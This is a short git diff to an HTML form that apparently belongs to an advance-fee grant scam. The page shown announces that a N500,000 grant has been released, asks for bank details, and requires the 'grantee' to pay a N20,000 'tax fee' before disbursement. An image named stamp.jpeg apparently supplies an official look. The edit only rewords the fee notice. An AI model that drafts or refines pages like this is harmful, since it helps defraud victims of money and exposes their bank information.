--- a/form.html
+++ b/form.html
@@ -141,7 +141,7 @@
         <input type="text" class="Input" placeholder="Bank">
       </div>
       <p>The grant, totaling N500,000 (Five Hundred Thousand Naira) has been released and will be paid out to the Grantee's provided Bank account.</p>
-      <p>PLEASE NOTE: Grantee is required to pay a tax fee of N20,000 (Twenty Thousand Naira) before the disbursement.</p>
+      <p>NOTE: Grantee is required to pay a tax fee of N20,000 (Twenty Thousand Naira) before the disbursement.</p>
     </div>
     <div class="end">
       <img src="stamp.jpeg" alt="stamp">
